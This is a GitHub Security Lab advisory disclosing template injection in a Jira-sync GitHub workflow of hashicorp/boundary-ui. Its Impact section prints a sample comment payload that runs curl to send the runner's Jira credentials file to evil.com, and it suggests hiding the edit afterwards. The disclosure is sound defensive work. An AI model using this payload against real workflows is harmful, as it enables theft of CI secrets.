skip to content
Back to GitHub.com
Home Bounties CodeQL Research Advisories Get Involved Events
December 3, 2020

GHSL-2020-207: Template injection in a GitHub workflow of repository hashicorp/boundary-ui

Jaroslav Lobacevski

Summary

Automatic GitHub workflow in hashicorp/boundary-ui repository is vulnerable to template injection from user comments.

Product

hashicorp/boundary-ui repository

Tested Version

Main branch.

Details

Issue: Hidden expression expansion of input parameters passed to atlassian/gajira-comment

Sync comment step in jira.yml workflow is vulnerable to template injection.

The ${{ github.event.comment.body }} is used to format input values to atlassian/gajira-comment action:

- name: Sync comment
  if: github.event.action == 'created' && steps.search.outputs.issue
  uses: atlassian/gajira-comment@v2.0.1
  with:
    issue: ${{ steps.search.outputs.issue }}
    comment: "${{ github.actor }} ${{ github.event.review.state || 'commented' }}:\n\n${{ github.event.comment.body || github.event.review.body }}\n\n${{ github.event.comment.html_url || github.event.review.html_url }}"

However the Atlassian action has a hidden feature - it expands {{}} internally. This way when the comment body contains an expression in double curly braces it is evaluated by node.js in these actions.

Impact

This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may comment on an issue with:

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the comment to Never mind my bad.

Coordinated Disclosure Timeline

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-207 in any communication regarding this issue.